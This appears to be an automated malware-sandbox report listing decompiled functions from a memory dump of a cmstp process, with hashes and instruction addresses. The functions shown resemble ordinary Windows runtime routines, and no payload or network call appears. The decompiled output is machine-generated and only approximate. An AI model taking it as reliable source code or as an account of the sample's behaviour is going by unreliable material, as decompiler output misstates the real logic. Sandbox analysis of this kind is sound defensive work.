0x050d527e

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c416464d9952982c4a1bf3f9d9f8dcb22efb94afacce4937803cbf2b1b0ac83
Instruction ID: 39c6894f98f7f48e4e9167e06b902a2fbd2861cced80b4c79fb3abcab20dad72
Opcode Fuzzy Hash: 0c416464d9952982c4a1bf3f9d9f8dcb22efb94afacce4937803cbf2b1b0ac83
Instruction Fuzzy Hash: 42311435651700EBC721AB18DCAAF7EB7E6FF14760F11462AE8160B5A0DB71E804CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 05113D43 Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05113D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E050E7B60(0, _t61, 0x50b11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E050E7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L050F4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x05113d4c
0x05113d50
0x05113d55
0x05113d5e
0x0514e79a
0x00000000
0x0514e79a
0x05113d68
0x0514e789
0x05113d9d
0x05113da3
0x05113daf
0x05113db5
0x05113dbc
0x05113dc4
0x05113dc9
0x05113dce
0x0514e7ae
0x0514e7ae
0x05113dde
0x05113de2
0x05113de7
0x05113e0d
0x05113e13
0x05113e16
0x05113e1e
0x05113e25
0x05113e28
0x00000000
0x00000000
0x05113e2a
0x05113e2f
0x05113e37
0x05113e37
0x00000000
0x05113e37
0x05113e31
0x00000000
0x05113e31
0x05113e20
0x05113e20
0x05113e35
0x00000000
0x05113de9
0x05113de9
0x05113de9
0x05113dee
0x05113dfd
0x05113dff
0x05113e02
0x05113e05
0x05113e05
0x00000000
0x05113df0
0x05113de7
0x0514e78f
0x0514e794
0x05113d79
0x05113d84
0x05113d89
0x05113d8e
0x00000000
0x0514e7a4
0x05113d96
0x05113d9a
0x00000000
0x05113d9a
0x00000000
0x0514e794
0x05113d6e
0x05113d73
0x00000000
0x0514e7b5
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db0aa8cd77fa7d370df496aa8ed63935163fdbab1a5f54a5555a2321409ac2d1
Instruction ID: 3a4fc41f8982a39dec1c75e9290e2f6d35883c2d3e98c80a990a3750505b60a6
Opcode Fuzzy Hash: db0aa8cd77fa7d370df496aa8ed63935163fdbab1a5f54a5555a2321409ac2d1
Instruction Fuzzy Hash: 8D31CF35A05610DBCB38CF29D441A7BBBAAFF45750B0688BAE856CB354E730D841C799

Uniqueness

Uniqueness Score: -1.00%

Function 0510A61C Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0510A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x51b0220);
				E0512D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x51c7b9c; // 0x0
				_t55 = L050F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0512D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x51c7b10 =  *0x51c7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x51c536c; // 0x33ad468
					if( *_t51 != 0x51c5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x51c5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x51c536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0510A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x0510a61c
0x0510a61e
0x0510a623
0x0510a628
0x0510a62b
0x0510a62d
0x0510a648
0x0510a64a
0x0510a64f
0x05149b44
0x0510a6ec
0x0510a6f1
0x0510a6f1
0x0510a655
0x0510a657
0x0510a65a
0x0510a65d
0x0510a662
0x0510a663
0x0510a667
0x0510a668
0x0510a66d
0x0510a706
0x0510a706
0x05149bda
0x05149be6
0x05149beb
0x00000000
0x05149beb
0x0510a679
0x05149b7a
0x00000000
0x05149b7a
0x0510a683
0x0510a6f4
0x0510a6f7
0x0510a6f9
0x0510a6fd
0x0510a6a0
0x0510a6a0
0x0510a6ad
0x0510a6af
0x0510a6b4
0x05149ba7
0x05149bac
0x00000000
0x00000000
0x05149bc6
0x05149bce
0x05149bd1
0x05149bd3
0x05149bd3
0x00000000
0x05149bd1
0x0510a6bd
0x0510a6c3
0x0510a6c6
0x0510a6d2
0x0510a701
0x0510a704
0x00000000
0x0510a704
0x0510a6d4
0x0510a6d6
0x0510a6d9
0x0510a6db
0x0510a6e1
0x0510a6e6
0x0510a6e8
0x0510a6e8
0x0510a6ea
0x00000000
0x0510a6ea
0x0510a688
0x0510a692
0x0510a694
0x0510a699
0x00000000
0x00000000
0x0510a69d
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aee9914a24672dd2c311efb76adf04e8849c701c24a50bda61c11cae9d2b87d4
Instruction ID: db0887bf8ef4394cbc7b17ab7b37f905e2c1a89f923f6c2717010d6c92ec3ca6
Opcode Fuzzy Hash: aee9914a24672dd2c311efb76adf04e8849c701c24a50bda61c11cae9d2b87d4
Instruction Fuzzy Hash: 08417975A04305DFCB19CF58D490BAABBF2FF89300F1581A9E905AB385C7B5A941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 050FC182 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E050FC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E050F7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E051A8D34(_v8, _t80);
					}
					E050F2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E050EFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E051A8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E050EFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0511B180();
						if(_a4 != 0) {
							E050F2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E050FBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E050FBB2D(_t16, _t15);
						E050FB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E050EFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E050EFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E050EFFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x050fc18d
0x050fc18f
0x050fc191
0x050fc19b
0x050fc1a0
0x050fc1d4
0x050fc1de
0x05142d6e
0x050fc1e4
0x050fc1e4
0x050fc1e4
0x050fc1ec
0x05142d7d
0x05142d7d
0x050fc1f3
0x050fc1ff
0x05142d88
0x05142d8d
0x05142d94
0x05142d94
0x05142d9f
0x05142da4
0x05142dab
0x05142db0
0x05142db2
0x05142db3
0x05142db4
0x05142dbc
0x05142dc3
0x05142dc3
0x050fc205
0x050fc205
0x050fc208
0x050fc20e
0x050fc211
0x050fc216
0x050fc219
0x050fc21f
0x050fc222
0x050fc22c
0x050fc234
0x050fc23a
0x050fc23f
0x050fc245
0x050fc24b
0x050fc251
0x050fc25a
0x050fc276
0x050fc27d
0x050fc27d
0x050fc25c
0x050fc25c
0x00000000
0x050fc25e
0x050fc1a4
0x050fc1aa
0x050fc1b3
0x050fc265
0x050fc26c
0x050fc26c
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: d0d8adba07fbb32c37317316f7cc2634f0046b0b743b42029896c5141330cc3c
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: D3319A72B0858BBEE744EBB0E885BEDF795FF52200F18815AD51C47201CB346E55CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05157016 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E05157016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x51cd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E05156B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E05156B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E050F7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E05119AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0511B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L050F4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x05157016
0x0515701e
0x0515702b
0x05157033
0x05157037
0x0515703c
0x0515703e
0x05157041
0x05157045
0x0515704a
0x05157050
0x05157055
0x0515705a
0x05157062
0x05157062
0x0515705a
0x05157064
0x05157064
0x05157067
0x05157071
0x05157096
0x0515709b
0x051570a2
0x051570a6
0x051570a7
0x051570ad
0x051570b3
0x051570b6
0x051570bb
0x051570c3
0x051570c3
0x051570c6
0x051570cd
0x051570dd
0x051570e0
0x051570e2
0x051570e2
0x051570ee
0x05157101
0x051570f0
0x051570f9
0x051570f9
0x0515710a
0x0515710e
0x05157112
0x05157117
0x05157118
0x05157118
0x051570bb
0x0515711d
0x05157123
0x05157131
0x05157131
0x05157136
0x0515713d
0x0515713e
0x0515713f
0x0515714a
0x0515714a
0x05157084
0x05157088
0x00000000
0x0515708e
0x0515708e
0x05157092
0x00000000
0x05157092

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 317c815e2b3149576909cabb6dbf64686ee48b3555630aff237a30b29acf845d
Instruction ID: e48590ca801ce444149b34b8e2af65c027eafaf3ad11a69d341d7ee243ab1a3a
Opcode Fuzzy Hash: 317c815e2b3149576909cabb6dbf64686ee48b3555630aff237a30b29acf845d
Instruction Fuzzy Hash: 4631C472608751DFC321DF28D981A6AB7E5FF88750F044A29FCA687690E730E904C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 05183D40 Relevance: .1, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E05183D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x51cd360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E050F2280(_t34, 0x51c8a6c);
				_t64 =  *0x51c5768; // 0x77575768
				if(_t64 != 0x51c5768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77575770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E050EFFB0(_t53, _t64, 0x51c8a6c);
						 *0x51cb1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E050F2280(_t45, 0x51c8a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x51c5768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E050EFFB0(_t51, _t64, 0x51c8a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E0511B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

0x05183d40
0x05183d48
0x05183d52
0x05183d59
0x05183d5d
0x05183d61
0x05183d63
0x05183d67
0x05183d69
0x05183d72
0x05183d76
0x05183d7a
0x05183d7f
0x05183d8b
0x05183d91
0x05183d91
0x05183d91
0x05183d94
0x05183d96
0x05183d9d
0x05183da1
0x05183db0
0x05183dba
0x05183dbc
0x05183dbc
0x05183dc6
0x05183dcb
0x05183dcf
0x05183dd1
0x05183dd4
0x00000000
0x00000000
0x05183dd9
0x05183e0c
0x05183e0c
0x05183e0f
0x05183ddb
0x05183ddb
0x05183de0
0x00000000
0x05183de2
0x05183de2
0x05183de4
0x05183de8
0x05183deb
0x05183df1
0x00000000
0x05183df3
0x05183df3
0x05183df5
0x05183df8
0x05183dfa
0x00000000
0x05183dfa
0x05183df1
0x05183de0
0x05183e11
0x05183e11
0x00000000
0x05183dfe
0x05183e04
0x05183e06
0x00000000
0x05183e06
0x00000000
0x05183e04
0x05183d91
0x05183e15
0x05183e1a
0x05183e1f
0x05183e1f
0x05183e23
0x05183e29
0x00000000
0x00000000
0x05183e2e
0x00000000
0x05183e30
0x05183e30
0x05183e35
0x00000000
0x05183e37
0x05183e3e
0x05183e42
0x05183e48
0x05183e4e
0x00000000
0x05183e4e
0x05183e35
0x00000000
0x05183e2e
0x05183e5b
0x05183e5c
0x05183e5d
0x05183e68
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d82702c7ca645debcd52c2087f9bebaebd18421ee0533be070929b2a2b27112
Instruction ID: 239046c58a5f01e1b859a70c78413a3f61cc53036d9e9b4350053e61f926ba06
Opcode Fuzzy Hash: 4d82702c7ca645debcd52c2087f9bebaebd18421ee0533be070929b2a2b27112
Instruction Fuzzy Hash: 8E317A71609302DFC724EF14D98586ABFE2FF85A04F4949AEF4999B240D731E944CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 051053C5 Relevance: .1, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E051053C5(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t56;
				unsigned int _t58;
				char _t63;
				unsigned int _t72;
				signed int _t77;
				intOrPtr _t79;
				void* _t80;

				_push(0x18);
				_push(0x51aff80);
				E0512D08C(__ebx, __edi, __esi);
				_t79 = __ecx;
				 *((intOrPtr*)(_t80 - 0x28)) = __ecx;
				 *((char*)(_t80 - 0x1a)) = 0;
				 *((char*)(_t80 - 0x19)) = 0;
				 *((intOrPtr*)(_t80 - 0x20)) = 0;
				 *((intOrPtr*)(_t80 - 4)) = 0;
				if(( *(__ecx + 0x40) & 0x75010f61) != 0 || ( *(__ecx + 0x40) & 0x00000002) == 0 || ( *( *[fs:0x30] + 0x68) & 0x00000800) != 0) {
					_t47 = 0;
					_t63 = 1;
				} else {
					_t63 = 1;
					_t47 = 1;
				}
				if(_t47 == 0) {
					_t77 = 0xc000000d;
					goto L18;
				} else {
					E050EEEF0( *((intOrPtr*)(_t79 + 0xc8)));
					 *((char*)(_t80 - 0x19)) = _t63;
					if( *((char*)(_t79 + 0xda)) == 2) {
						_t47 =  *(_t79 + 0xd4);
					} else {
						_t47 = 0;
					}
					if(_t47 != 0) {
						_t77 = 0;
						goto L18;
					} else {
						if( *((intOrPtr*)(_t79 + 0xd8)) != 0) {
							_t77 = 0xc000001e;
							L18:
							 *((intOrPtr*)(_t80 - 0x20)) = _t77;
							L19:
							_t64 = 0xffff;
							L14:
							 *((intOrPtr*)(_t80 - 4)) = 0xfffffffe;
							E05105520(_t47, _t64, _t79);
							return E0512D0D1(_t77);
						}
						 *((short*)(_t79 + 0xd8)) = _t63;
						 *((char*)(_t80 - 0x1a)) = _t63;
						_t72 =  *0x51c5cb4; // 0x4000
						_t69 = _t79;
						_t77 = E051055C8(_t79, (_t72 >> 3) + 2);
						 *((intOrPtr*)(_t80 - 0x20)) = _t77;
						if(_t77 < 0) {
							goto L19;
						}
						E05105539(_t79,  *((intOrPtr*)(_t79 + 0xb4)), _t69);
						 *(_t79 + 0xd4) =  *(_t79 + 0xd4) & 0x00000000;
						 *((char*)(_t79 + 0xda)) = 0;
						E050EEB70(_t79,  *((intOrPtr*)(_t79 + 0xc8)));
						 *((char*)(_t80 - 0x19)) = 0;
						_t71 = _t79;
						 *(_t80 - 0x24) = E05103C3E(_t79);
						E050EEEF0( *((intOrPtr*)(_t79 + 0xc8)));
						 *((char*)(_t80 - 0x19)) = _t63;
						_t56 =  *(_t80 - 0x24);
						if(_t56 == 0) {
							_t77 = 0xc0000017;
							 *((intOrPtr*)(_t80 - 0x20)) = 0xc0000017;
						} else {
							 *(_t79 + 0xd4) = _t56;
							 *((short*)(_t79 + 0xda)) = 0x202;
							if((E05104190() & 0x00010000) == 0) {
								_t58 =  *0x51c5cb4; // 0x4000
								 *(_t79 + 0x6c) = _t58 >> 3;
							}
						}
						_t64 = 0xffff;
						 *((intOrPtr*)(_t79 + 0xd8)) =  *((intOrPtr*)(_t79 + 0xd8)) + 0xffff;
						 *((char*)(_t80 - 0x1a)) = 0;
						 *((char*)(_t80 - 0x19)) = 0;
						_t47 = E050EEB70(_t71,  *((intOrPtr*)(_t79 + 0xc8)));
						goto L14;
					}
				}
			}

0x051053c5
0x051053c7
0x051053cc
0x051053d1
0x051053d3
0x051053d8
0x051053db
0x051053de
0x051053e1
0x051053eb
0x051470b0
0x051470b4
0x0510540e
0x05105410
0x05105411
0x05105411
0x05105415
0x051470ba
0x00000000
0x0510541b
0x05105421
0x05105426
0x05105432
0x051470d3
0x05105438
0x05105438
0x05105438
0x0510543c
0x051470de
0x00000000
0x05105442
0x05105449
0x051470c1
0x051470c6
0x051470c6
0x051470c9
0x051470c9
0x0510550c
0x0510550c
0x05105513
0x0510551f
0x0510551f
0x0510544f
0x05105456
0x05105459
0x05105465
0x0510546c
0x0510546e
0x05105473
0x00000000
0x00000000
0x05105482
0x05105487
0x0510548e
0x0510549b
0x051054a0
0x051054a4
0x051054ab
0x051054b4
0x051054b9
0x051054bc
0x051054c1
0x051470e2
0x051470e7
0x051054c7
0x051054c7
0x051054cd
0x051054e0
0x051054e2
0x051054ea
0x051054ea
